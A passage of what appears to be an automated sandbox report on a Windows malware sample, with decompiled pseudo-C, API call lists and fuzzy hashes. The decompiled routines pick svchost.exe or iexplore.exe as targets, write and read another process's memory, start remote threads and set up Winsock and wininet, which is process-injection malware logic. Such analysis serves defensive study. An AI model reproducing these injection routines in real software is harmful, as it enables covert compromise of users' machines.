					_t62 =  *(_t70 - 0x20);
					_t69 = _t52 +  *(_t70 - 0x20);
					 *((intOrPtr*)(_t70 - 0x3c)) = _t69;
					__eflags = _t52 - 0x78;
					if(_t52 == 0x78) {
						_t56 = 0xd80 -  *((intOrPtr*)(_t69 + 8));
						 *((intOrPtr*)(_t70 - 0x40)) = 0xd80;
						__eflags =  *(_t70 - 0x24) - 0xd80;
						if( *(_t70 - 0x24) > 0xd80) {
							_t62 =  *(_t70 - 0x24) - _t56;
							__eflags =  *(_t70 - 0x24) - _t56;
							E001D176E(_t66,  *(_t70 - 0x24) - _t56, _t69, 0,  *(_t70 - 0x24) - _t56);
						}
					}
					_t54 = E001D20DA(_t61, _t62, _t69, _t70 - 0xdc0,  *(_t70 - 0x24));
					goto L14;
				} else {
					if( *(_t70 - 0x30) != 0x3708) {
						L15:
						 *(_t70 - 0x1c) = 1;
						 *( *(_t70 - 0x20) + 0x5c) =  *( *(_t70 - 0x20) + 0x5c) & 0x000000fb;
					} else {
						_t59 =  *(_t70 - 0x20) + 0x3708;
						 *((intOrPtr*)(_t70 - 0x38)) = _t59;
						_push( *_t59);
						if( *(_t70 - 0x28) == 0) {
							_t54 = ResetEvent();
						} else {
							_t54 = SetEvent();
						}
						L14:
						 *(_t70 - 0x1c) = _t54;
					}
					goto L16;
				}
			}















0x001d2165
0x001d216a
0x001d216f
0x001d2174
0x001d2180
0x001d2182
0x001d2190
0x001d219f
0x001d227a
0x001d227a
0x001d2281
0x001d2281
0x001d21af
0x001d21b8
0x00000000
0x00000000
0x001d21c2
0x001d21fd
0x001d2201
0x00000000
0x00000000
0x001d2215
0x001d2217
0x001d2219
0x00000000
0x00000000
0x001d221b
0x001d221e
0x001d2221
0x001d2224
0x001d2227
0x001d222a
0x001d2231
0x001d2234
0x001d2237
0x001d223a
0x001d223f
0x001d223f
0x001d2245
0x001d2245
0x001d223a
0x001d2255
0x00000000
0x001d21cd
0x001d21d4
0x001d225f
0x001d225f
0x001d2269
0x001d21da
0x001d21dd
0x001d21e2
0x001d21e5
0x001d21eb
0x001d21f5
0x001d21ed
0x001d21ed
0x001d21ed
0x001d225a
0x001d225a
0x001d225a
0x00000000
0x001d21d4

APIs
  • GetStdHandle.KERNEL32(000000F4,?,?,?,?,?,?,001D1400,00000DB0), ref: 001D217A
  • ReadProcessMemory.KERNEL32(00000000,?,?,00000010,?,?,?,?,?,?,?,001D1400,00000DB0), ref: 001D219B
  • ReadProcessMemory.KERNEL32(00000000,?,?,00000004,?,?,?,?,?,?,?,001D1400,00000DB0), ref: 001D21B4
  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,001D1400,00000DB0), ref: 001D21ED
  • ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,001D1400,00000DB0), ref: 001D21F5
  • ReadProcessMemory.KERNEL32(00000000,?,?,00000000,?), ref: 001D2215
    • Part of subcall function 001D20DA: SetEvent.KERNEL32(?,?,?), ref: 001D2147
    • Part of subcall function 001D176E: ResetEvent.KERNEL32(?,?,?,?,?,001D1CDD,?,?,00000240,?,?), ref: 001D17B5
  • ExitThread.KERNEL32 ref: 001D2281
Strings
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: GetEnvironmentVariableRegCloseKeyRegOpenKeyRegQueryValueExlstrcat
  • String ID: [FILE]$SystemRoot$[FILE]
  • API String ID: 4133047914-1656360392
  • Opcode ID: ae84fe3816e58394a110c5285e10b2d815e972e04ba8194b59fa15e7161023db
  • Instruction ID: ed5e67ec67d69c723361dcf29c487c07ff661bc4f43c96eb3a608c29c8c24653
  • Opcode Fuzzy Hash: 09D02ECA440F87F8661BB080082DF82B092FE633C04EC63003440592C18F8CB16FEF90
  • Instruction Fuzzy Hash: ed5e67ec67d69c723361dcf29c487c07ff661bc4f43c96eb3a608c29c8c24653
C-Code - Quality: 100%
			E001D3734(void* __ecx, char* _a4, void* _a8) {
				int _v8;
				int _v12;
				char* _t13;
				char* _t23;
				long _t27;
				void* _t29;

				_t27 = _a8;
				_t23 = 0;
				_t29 =  *0x1d506c - _t23; // 0x0
				if(_t29 != 0 || GetEnvironmentVariableA("SystemRoot", _a4, _t27) == 0) {
					if(RegOpenKeyA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\iexplore.exe",  &_a8) == 0) {
						_v8 = _t27;
						if(RegQueryValueExA(_a8, _t23, _t23,  &_v12, _a4,  &_v8) == 0) {
							_t23 = 1;
						}
						RegCloseKey(_a8);
					}
					_t13 = _t23;
				} else {
					lstrcatA(_a4, "\\System32\\svchost.exe");
					_t13 = 1;
				}
				return _t13;
			}









0x001d373a
0x001d373e
0x001d3740
0x001d3746
0x001d3784
0x001d3796
0x001d37a1
0x001d37a5
0x001d37a5
0x001d37a9
0x001d37a9
0x001d37af
0x001d375b
0x001d3763
0x001d376b
0x001d376b
0x001d37b4

APIs
  • GetEnvironmentVariableA.KERNEL32(SystemRoot,?,?,00000044,00000000,?,?,?,001D3118,?,00000104), ref: 001D3751
  • lstrcatA.KERNEL32(?,\System32\svchost.exe,?,?,?,001D3118,?,00000104), ref: 001D3763
  • RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe,?), ref: 001D377C
  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,001D3118,?,00000104), ref: 001D3799
  • RegCloseKey.ADVAPI32(?,?,?,?,001D3118,?,00000104), ref: 001D37A9
Strings
  • SystemRoot, xrefs: 001D374C
  • Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe, xrefs: 001D3772
  • \System32\svchost.exe, xrefs: 001D375B
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: GetStdHandle$CloseHandleCreateRemoteThreadResumeThreadWaitForMultipleObjects
  • String ID: <
  • API String ID: 2446352009-4251816714
  • Opcode ID: c8242842e98a66eb1eacbd90598b53cfcf33de66ab7a76e9081f6078d45f9eb3
  • Instruction ID: d914cf60e619c89091d9c255d0f38381d528009b3ccf1d544689daf830366f30
  • Opcode Fuzzy Hash: ED0168420642E5B3F54776C41649B2051A1EF43AF5E2C032379BDB26C81B88AE29BF89
  • Instruction Fuzzy Hash: d914cf60e619c89091d9c255d0f38381d528009b3ccf1d544689daf830366f30
C-Code - Quality: 93%
			E001D27E6(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t56;
				void* _t73;
				void* _t78;
				void* _t83;
				void* _t84;

				_push(0xe4);
				_push(0x1d13d0);
				E001D1637(__ebx, __edi, __esi);
				 *(_t84 - 0x20) = 0;
				 *(_t84 - 0x1c) = 0;
				 *((intOrPtr*)(_t84 - 0x28)) = 0;
				 *(_t84 - 0x20) = GetStdHandle(0xfffffff4);
				E001D384D(_t84 - 0xb4, 0, 0x40);
				 *((short*)(_t84 - 0xb4)) = 0x3c;
				E001D3834(_t84 - 0xf4, _t84 - 0xb4, 0x40);
				E001D3864(_t84 - 0x74, _t84 - 0xf4, _t84 - 0xb4);
				 *((intOrPtr*)(_t84 - 0x40)) = E001D3C08;
				 *((intOrPtr*)(_t84 - 0x3c)) = E001D3C9A;
				 *((intOrPtr*)(_t84 - 0x38)) = E001D1C6D;
				_t83 =  *(_t84 + 8);
				 *(_t84 - 0x34) = _t83;
				 *_t83 = 0x238;
				 *((intOrPtr*)(_t83 + 4)) = 6;
				if( *(_t84 - 0x20) != 0 &&  *(_t84 - 0x20) == GetStdHandle(0xfffffff6)) {
					 *((intOrPtr*)(_t84 - 0x28)) = 1;
					 *(_t83 + 0x1bbc) =  *(_t83 + 0x1bbc) | 0x00000004;
					_t73 = CreateRemoteThread( *(_t84 - 0x20), 0, 0, E001D1722(E001D2997), _t83, 4, _t84 - 0x2c);
					 *(_t84 - 0x1c) = _t73;
					if(_t73 == 0) {
						 *(_t83 + 0x1bbc) =  *(_t83 + 0x1bbc) & 0x000000fb;
					}
				}
				 *((intOrPtr*)(_t84 - 0x24)) = E001D17D0;
				_t78 = E001D1CFD;
				_t56 =  *((intOrPtr*)(_t83 + 0x6c)) - 3;
				if(_t56 == 0) {
					L7:
					_t78 = 0;
					goto L8;
				} else {
					if(_t56 != 1) {
						L8:
						_t76 = _t83 + 0x1bc8;
						if(E001D1E99(_t83, _t83 + 0x1bc8, _t78, 2) == 0 || E001D1E99(_t83, _t83 + 0x78,  *((intOrPtr*)(_t84 - 0x24)), 1) == 0) {
							L17:
							return E001D173E(E001D38F2(_t84 - 0x74));
						} else {
							 *(_t84 - 4) = 0;
							if( *((intOrPtr*)(_t84 - 0x28)) == 0) {
								E001D2F13(_t76, 0);
							}
							if( *(_t84 - 0x1c) == 0) {
								do {
									_push(_t84 - 0x74);
									__eflags = E001D2522(0, _t83, __eflags);
								} while (__eflags != 0);
								goto L16;
							} else {
								ResumeThread( *(_t84 - 0x1c));
								WaitForMultipleObjects(2, _t84 - 0x20, 0, 0xffffffff);
								CloseHandle( *(_t84 - 0x1c));
								L16:
								 *(_t84 - 4) =  *(_t84 - 4) | 0xffffffff;
								goto L17;
							}
						}
					}
					 *((intOrPtr*)(_t84 - 0x24)) = 0;
					goto L7;
				}
			}








0x001d27e6
0x001d27eb
0x001d27f0
0x001d27f7
0x001d27fa
0x001d27fd
0x001d280a
0x001d2817
0x001d281c
0x001d2835
0x001d284c
0x001d2851
0x001d2858
0x001d285f
0x001d2866
0x001d2869
0x001d286c
0x001d2872
0x001d287c
0x001d2887
0x001d288e
0x001d28ac
0x001d28b2
0x001d28b7
0x001d28b9
0x001d28b9
0x001d28b7
0x001d28c0
0x001d28c7
0x001d28cf
0x001d28d2
0x001d28da
0x001d28da
0x00000000
0x001d28d4
0x001d28d5
0x001d28dc
0x001d28dc
0x001d28ee
0x001d2954
0x001d2962
0x001d2903
0x001d2903
0x001d2909
0x001d290d
0x001d290d
0x001d2915
0x001d293a
0x001d293d
0x001d2943
0x001d2943
0x00000000
0x001d2917
0x001d291a
0x001d2929
0x001d2932
0x001d2950
0x001d2950
0x00000000
0x001d2950
0x001d2915
0x001d28ee
0x001d28d7
0x00000000
0x001d28d7

APIs
  • GetStdHandle.KERNEL32(000000F4,001D13D0,000000E4), ref: 001D2808
    • Part of subcall function 001D3864: GetVersion.KERNEL32 ref: 001D3881
  • GetStdHandle.KERNEL32(000000F6), ref: 001D2880
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,?,00000004,?), ref: 001D28AC
    • Part of subcall function 001D1E99: InitializeCriticalSection.KERNEL32(?), ref: 001D1ED1
    • Part of subcall function 001D1E99: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001D1EE4
    • Part of subcall function 001D1E99: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001D1EF1
    • Part of subcall function 001D1E99: CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 001D1F15
    • Part of subcall function 001D1E99: SetThreadPriority.KERNEL32(?,?), ref: 001D1F2E
  • CloseHandle.KERNEL32(?), ref: 001D2932
    • Part of subcall function 001D2F13: ResetEvent.KERNEL32(?,?,?,00000D80,001D185C,?,00000002), ref: 001D2F3D
    • Part of subcall function 001D2F13: SetEvent.KERNEL32(?,?,?,00000D80,001D185C,?,00000002), ref: 001D2F49
    • Part of subcall function 001D2F13: WaitForSingleObject.KERNEL32(?,00000000), ref: 001D2F7C
  • ResumeThread.KERNEL32(?), ref: 001D291A
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001D2929
Strings
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 5
  • API ID: CreateThreadGetCurrentThreadIdLocalAllocPeekMessagePostMessageSetThreadPriorityWSACleanupWSAStartup
  • String ID:
  • API String ID: 2542947916-0
  • Opcode ID: 2b16ed5e52240c4d80d8b10e68765e774bd0f7290044ab9ce1d8eea53ab31f33
  • Instruction ID: bca26f7798e6cc191a31618cb351ed7e9550d2e82e3dc5b9431044124c0254e2
  • Opcode Fuzzy Hash: E9014C02028CA5E7D0272B911CAA73B6042FF41FFCF9DA79271FC691C16F8596196F41
  • Instruction Fuzzy Hash: bca26f7798e6cc191a31618cb351ed7e9550d2e82e3dc5b9431044124c0254e2
C-Code - Quality: 91%
			E001D2648(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t42;
				void* _t54;
				void* _t56;
				void* _t63;
				void* _t65;
				void** _t71;
				void* _t75;
				void* _t76;

				_push(0x244);
				_push(0x1d13a0);
				E001D1637(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t76 - 0x1c)) = 0;
				E001D384D(_t76 - 0xa8, 0, 0x80);
				 *((intOrPtr*)(_t76 - 0x20)) = 5;
				while(1) {
					L1:
					 *(_t76 - 0x24) = 0;
					 *((intOrPtr*)(_t76 - 0x20)) =  *((intOrPtr*)(_t76 - 0x20)) - 1;
					_t42 =  *((intOrPtr*)(_t76 - 0x20)) - 1;
					if(_t42 == 0) {
						break;
					}
					_t56 = _t42 - 1;
					if(_t56 == 0) {
						_t69 =  *((intOrPtr*)(_t76 + 8));
						_t13 =  *((intOrPtr*)( *((intOrPtr*)(_t76 + 8)))) + 2; // 0x0
						if(E001D2CC7(_t76 - 0xa8,  *((intOrPtr*)( *((intOrPtr*)(_t76 + 8)))) + 6, _t13,  *((intOrPtr*)(_t69 + 4))) <= 0) {
							L14:
							E001D15A3(_t76 - 0xa8);
							while( *((intOrPtr*)(_t76 - 0x1c)) != 0) {
								 *((intOrPtr*)(_t76 - 0x1c)) =  *((intOrPtr*)(_t76 - 0x1c)) - 1;
								 *(_t76 - 4) = 0;
								L001D32DA();
								 *(_t76 - 4) =  *(_t76 - 4) | 0xffffffff;
							}
							return E001D173E(PostMessageA( *0x1d50c0, 0x400, 1, 2));
						}
						if(PeekMessageA(_t76 - 0xc4, 0, 0x12, 0x12, 0) == 0) {
							continue;
						}
						goto L14;
					}
					_t63 = _t56 - 1;
					if(_t63 == 0) {
						continue;
					}
					if(_t63 != 1) {
						goto L14;
					}
					_t65 = _t76 - 0x254;
					_push(_t65);
					_push(0x101);
					L001D1454();
					if(_t65 != 0) {
						goto L14;
					}
					 *((intOrPtr*)(_t76 - 0x1c)) =  *((intOrPtr*)(_t76 - 0x1c)) + 1;
				}
				_t75 = LocalAlloc(0x40, 0x4464);
				if(_t75 != 0) {
					 *(_t75 + 0x6c) = 1;
					 *(_t75 + 0x70) =  *(_t75 + 0x70) | 0xffffffff;
					 *(_t75 + 0x5c) =  *(_t75 + 0x5c) | 0x00000004;
					 *((intOrPtr*)(_t75 + 0x3ba8)) = GetCurrentThreadId();
					_t23 = _t75 + 0x3c58; // 0x3c58
					E001D3834(_t23, _t76 - 0xa8, 0x80);
					 *(_t75 + 0x6c) = 3;
					_t54 = CreateThread(0, 0, E001D3722, _t75, 0, _t76 - 0x28);
					_t26 = _t75 + 0x3ba4; // 0x3ba4
					_t71 = _t26;
					 *_t71 = _t54;
					if(_t54 != 0) {
						 *(_t76 - 0x24) = 1;
						 *((intOrPtr*)(_t76 - 0x74)) = 0;
						SetThreadPriority( *_t71, 0xfffffff1);
					}
				}
				E001D1ABC(_t75,  *(_t76 - 0x24));
				if( *(_t76 - 0x24) != 0) {
					goto L1;
				} else {
					goto L14;
				}
			}











0x001d2648
0x001d264d
0x001d2652
0x001d2659
0x001d266a
0x001d266f
0x001d2676
0x001d2676
0x001d2676
0x001d2679
0x001d267f
0x001d2680
0x00000000
0x00000000
0x001d2682
0x001d2683
0x001d26ad
0x001d26b5
0x001d26cb
0x001d277b
0x001d2782
0x001d2787
0x001d278c
0x001d278f
0x001d2792
0x001d2797
0x001d2797
0x001d27c6
0x001d27c6
0x001d26e6
0x00000000
0x00000000
0x00000000
0x001d26e8
0x001d2685
0x001d2686
0x00000000
0x00000000
0x001d2689
0x00000000
0x00000000
0x001d268f
0x001d2695
0x001d2696
0x001d269b
0x001d26a2
0x00000000
0x00000000
0x001d26a8
0x001d26a8
0x001d26fa
0x001d26fe
0x001d2700
0x001d2707
0x001d270b
0x001d2715
0x001d2723
0x001d272a
0x001d272f
0x001d2743
0x001d2749
0x001d2749
0x001d274f
0x001d2753
0x001d2755
0x001d275c
0x001d2763
0x001d2763
0x001d2753
0x001d276d
0x001d2775
0x00000000
0x00000000
0x00000000
0x00000000

APIs
  • WSAStartup.WSOCK32(00000101,?,?,?,?,?,?,00000000,00000080,001D13A0,00000244), ref: 001D269B
    • Part of subcall function 001D2CC7: LoadLibraryA.KERNEL32(wininet.dll), ref: 001D2CDB
    • Part of subcall function 001D2CC7: GetProcAddress.KERNEL32(001D12C8,001D12C8), ref: 001D2D07
    • Part of subcall function 001D2CC7: FreeLibrary.KERNEL32(?), ref: 001D2D3F
    • Part of subcall function 001D2CC7: inet_ntoa.WSOCK32(?), ref: 001D2D5E
    • Part of subcall function 001D2CC7: wsprintfA.USER32 ref: 001D2DBF
  • PeekMessageA.USER32(?,00000000,00000012,00000012,00000000), ref: 001D26DE
  • LocalAlloc.KERNEL32(00000040,00004464,?,?,?,?,?,00000000,00000080,001D13A0,00000244), ref: 001D26F4
  • GetCurrentThreadId.KERNEL32 ref: 001D270F
  • CreateThread.KERNEL32(00000000,00000000,001D3722,00000000,00000000,?), ref: 001D2743
  • SetThreadPriority.KERNEL32(00003BA4,000000F1), ref: 001D2763
    • Part of subcall function 001D1ABC: WaitForSingleObject.KERNEL32(?,00001388), ref: 001D1AED
    • Part of subcall function 001D1ABC: TerminateThread.KERNEL32(?,00000000), ref: 001D1B02
    • Part of subcall function 001D1ABC: CloseHandle.KERNEL32(?), ref: 001D1B0E
    • Part of subcall function 001D1ABC: LocalFree.KERNEL32(?,?), ref: 001D1B15
    • Part of subcall function 001D15A3: FreeLibrary.KERNEL32(00000000), ref: 001D15D1
  • WSACleanup.WSOCK32(?,?,?,?,?,00000000,00000080,001D13A0,00000244), ref: 001D2792
  • PostMessageA.USER32(00000400,00000001,00000002), ref: 001D27BB
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: CloseHandle$SetEvent$DeleteCriticalSectionEnterCriticalSectionWaitForSingleObject
  • String ID:
  • API String ID: 4003875101-0
  • Opcode ID: 04216faaea4ba07e98bcd26563bf42db8e4c0576a096f68bb43e63f5af89c022
  • Instruction ID: 111ecad9f7c2c59084eeb4c9e89245a319db93d705ee502b2a98683021befae7
  • Opcode Fuzzy Hash: D9E08C43914E1AD0C8A7FDC0082E7061E61B76D1E2E5EC5053282436417F1EE0089F89
  • Instruction Fuzzy Hash: 111ecad9f7c2c59084eeb4c9e89245a319db93d705ee502b2a98683021befae7
C-Code - Quality: 100%
			E001D19F3(intOrPtr _a4) {
				signed char _t11;
				void* _t13;
				void* _t14;
				void* _t15;
				void* _t16;
				signed char* _t24;
				void** _t27;
				intOrPtr _t29;
				void* _t30;
				struct _CRITICAL_SECTION* _t32;

				_t29 = _a4;
				_t24 = _t29 + 0x1b44;
				_t11 =  *_t24;
				if((_t11 & 0x00000001) != 0) {
					_t32 = _t29 + 0x1b18;
					 *_t24 = _t11 & 0x000000fe;
					EnterCriticalSection(_t32);
					_t13 =  *(_t29 + 0x1b40);
					if(_t13 != 0) {
						SetEvent(_t13);
					}
					_t14 =  *(_t29 + 0x1b10);
					if(_t14 != 0) {
						SetEvent(_t14);
					}
					_t27 = _t29 + 0x1b0c;
					_t15 =  *_t27;
					if(_t15 != 0) {
						WaitForSingleObject(_t15, 0x7d0);
						CloseHandle( *_t27);
						 *_t27 =  *_t27 & 0x00000000;
					}
					_t16 =  *(_t29 + 0x1b40);
					if(_t16 != 0) {
						_t16 = CloseHandle(_t16);
					}
					_t30 =  *(_t29 + 0x1b10);
					if(_t30 != 0) {
						_t16 = CloseHandle(_t30);
					}
					DeleteCriticalSection(_t32);
					return _t16;
				}
				return _t11;
			}













0x001d19f4
0x001d19f8
0x001d19fe
0x001d1a02
0x001d1a09
0x001d1a10
0x001d1a12
0x001d1a18
0x001d1a26
0x001d1a29
0x001d1a29
0x001d1a2b
0x001d1a33
0x001d1a36
0x001d1a36
0x001d1a3e
0x001d1a44
0x001d1a48
0x001d1a50
0x001d1a58
0x001d1a5a
0x001d1a5a
0x001d1a5d
0x001d1a65
0x001d1a68
0x001d1a68
0x001d1a6a
0x001d1a72
0x001d1a75
0x001d1a75
0x001d1a78
0x00000000
0x001d1a80
0x001d1a82

APIs
  • EnterCriticalSection.KERNEL32(?,00000000,?,76E1186A,?,001D1F3C,?), ref: 001D1A12
  • SetEvent.KERNEL32(?,?,76E1186A,?,001D1F3C,?), ref: 001D1A29
  • SetEvent.KERNEL32(?,?,76E1186A,?,001D1F3C,?), ref: 001D1A36
  • WaitForSingleObject.KERNEL32(?,000007D0), ref: 001D1A50
  • CloseHandle.KERNEL32(?), ref: 001D1A58
  • CloseHandle.KERNEL32(?), ref: 001D1A68
  • CloseHandle.KERNEL32(?), ref: 001D1A75
  • DeleteCriticalSection.KERNEL32(?,?,76E1186A,?,001D1F3C,?), ref: 001D1A78
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: CreateWindowExDispatchMessageGetMessageGetModuleFileNameRegisterClassSetTimerTranslateMessage
  • String ID:
  • API String ID: 1289143423-0
  • Opcode ID: a48adf90a0f1ca95f9f8ccd3f9eb1397de436c8d144647db204e4c52001b9e96
  • Instruction ID: 392c3d32be3034e4c8ac56a004de0633f00134dc32ddf829a8e1a5bcd824640c
  • Opcode Fuzzy Hash: ABE0D843065850B3DC4B75752C0C31787917BC9ECAC9C67093056F4248CB87A61CEF43
  • Instruction Fuzzy Hash: 392c3d32be3034e4c8ac56a004de0633f00134dc32ddf829a8e1a5bcd824640c
C-Code - Quality: 81%
			E001D2C05(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t11;
				signed int _t15;
				CHAR* _t30;
				void* _t35;

				_push(0x128);
				_push(0x1d13f0);
				E001D1637(__ebx, __edi, __esi);
				 *(_t35 - 4) = 0;
				_t11 =  *0x1d5044; // 0x1d0000
				 *0x001D50DC = _t11;
				_t30 = _t35 - 0x138;
				 *0x001D50F0 = _t30;
				GetModuleFileNameA(_t11, _t30, 0x103);
				RegisterClassA(0x1d50cc);
				 *0x1d50c0 = CreateWindowExA(0, _t30, 0, 0x80000, 0, 0, 0, 0, 0, 0, _t11, 0);
				_t15 =  *0x1d506c; // 0x0
				asm("sbb eax, eax");
				SetTimer( *0x1d50c0, 0x64, ( ~_t15 & 0xffff1d70) + 0xea60, 0);
				while(GetMessageA(_t35 - 0x34, 0, 0, 0) != 0) {
					TranslateMessage(_t35 - 0x34);
					DispatchMessageA(_t35 - 0x34);
				}
				 *0x1d50c0 = 0;
				 *(_t35 - 4) =  *(_t35 - 4) | 0xffffffff;
				return E001D173E(0);
			}







0x001d2c05
0x001d2c0a
0x001d2c0f
0x001d2c16
0x001d2c21
0x001d2c26
0x001d2c36
0x001d2c3c
0x001d2c49
0x001d2c4f
0x001d2c5b
0x001d2c61
0x001d2c68
0x001d2c7d
0x001d2c83
0x001d2c98
0x001d2ca2
0x001d2ca2
0x001d2caa
0x001d2cb9
0x001d2cc4

APIs
  • GetModuleFileNameA.KERNEL32(001D0000,?,00000103,001D50CC,00000000,?,00000000,00080000,00000000,00000000,00000000,00000000,00000000,00000000,001D0000,00000000), ref: 001D2C49
  • RegisterClassA.USER32 ref: 001D2C4F
  • CreateWindowExA.USER32 ref: 001D2C55
  • SetTimer.USER32(00000064,-0000EA60,00000000), ref: 001D2C7D
  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 001D2C8A
  • TranslateMessage.USER32(?), ref: 001D2C98
  • DispatchMessageA.USER32(?), ref: 001D2CA2
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: ExitThreadGetStdHandleLocalAllocLocalFreeReadProcessMemoryWriteProcessMemory
  • String ID:
  • API String ID: 3806972562-0
  • Opcode ID: d136b9818d58650d9e75ef7e59085fa17e81dc101a90658f0749166ad6ebe984
  • Instruction ID: fbdfbd466d78e4125f2339b7d6edc0ae403b586f458be2afe4e561cdaceb8fd3
  • Opcode Fuzzy Hash: 17E04F44158F6AE1912A79441A0F72B9014BFD7BF9C0C0B37B138315C11B5E751A6B05
  • Instruction Fuzzy Hash: fbdfbd466d78e4125f2339b7d6edc0ae403b586f458be2afe4e561cdaceb8fd3
C-Code - Quality: 74%
			E001D2997() {
				void* _t40;
				long _t41;
				void* _t42;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t47;

				_push(0x10);
				_push(0x1d13c0);
				E001D1637(_t40, _t43, _t45);
				 *(_t47 - 0x1c) = LocalAlloc(0x40, 0x4464);
				_t44 = GetStdHandle(0xfffffff4);
				 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
				if( *(_t47 - 0x1c) != 0) {
					_push(_t47 - 0x20);
					_t41 = 4;
					_t46 =  *(_t47 + 8);
					if(WriteProcessMemory(_t44, _t46 + 0x84, _t47 - 0x1c, _t41, ??) != 0 && ReadProcessMemory(_t44, _t46,  *(_t47 - 0x1c), 0x78, _t47 - 0x20) != 0) {
						 *( *(_t47 - 0x1c) + 0x6c) = _t41;
						 *( *(_t47 - 0x1c) + 0x70) =  *( *(_t47 - 0x1c) + 0x70) | 0xffffffff;
						 *( *(_t47 - 0x1c) + 0x370c) =  *( *(_t47 - 0x1c) + 0x370c) | _t41;
						 *( *(_t47 - 0x1c) + 0x1bd4) = _t46;
						E001D27E6(_t41, _t42, _t44, _t46,  *( *(_t47 - 0x1c) + 0x370c),  *(_t47 - 0x1c));
					}
					LocalFree( *(_t47 - 0x1c));
				}
				 *(_t47 - 4) =  *(_t47 - 4) | 0xffffffff;
				ExitThread(0);
			}











0x001d2997
0x001d2999
0x001d299e
0x001d29b0
0x001d29bb
0x001d29bd
0x001d29c5
0x001d29ca
0x001d29cd
0x001d29d3
0x001d29e6
0x001d2a00
0x001d2a06
0x001d2a0d
0x001d2a16
0x001d2a1f
0x001d2a1f
0x001d2a27
0x001d2a27
0x001d2a36
0x001d2a3c

APIs
  • LocalAlloc.KERNEL32(00000040,00004464,001D13C0,00000010), ref: 001D29AA
  • GetStdHandle.KERNEL32(000000F4), ref: 001D29B5
  • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000004,?), ref: 001D29DE
  • ReadProcessMemory.KERNEL32(00000000,?,00000000,00000078,?), ref: 001D29F3
    • Part of subcall function 001D27E6: GetStdHandle.KERNEL32(000000F4,001D13D0,000000E4), ref: 001D2808
    • Part of subcall function 001D27E6: GetStdHandle.KERNEL32(000000F6), ref: 001D2880
    • Part of subcall function 001D27E6: CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,?,00000004,?), ref: 001D28AC
    • Part of subcall function 001D27E6: ResumeThread.KERNEL32(?), ref: 001D291A
    • Part of subcall function 001D27E6: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001D2929
    • Part of subcall function 001D27E6: CloseHandle.KERNEL32(?), ref: 001D2932
  • LocalFree.KERNEL32(00000000), ref: 001D2A27
  • ExitThread.KERNEL32 ref: 001D2A3C
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 3
  • API ID: CloseHandleCreateRemoteThreadGetExitCodeThreadWaitForMultipleObjects
  • String ID: !$@
  • API String ID: 3598368018-1106925043
  • Opcode ID: 94e025a43e91df62a48eb6b8a64d63848b0e0c680d25aaeca4969afcd1c9ee64
  • Instruction ID: 6812434df433a10a49eb64cdae1d93602e3d9f75bbdf674f19957a85cb12a94c
  • Opcode Fuzzy Hash: CCD0A700DE1DC65871531046B5E47F3F1049F121CED5C379532992CB0C4B257038A241
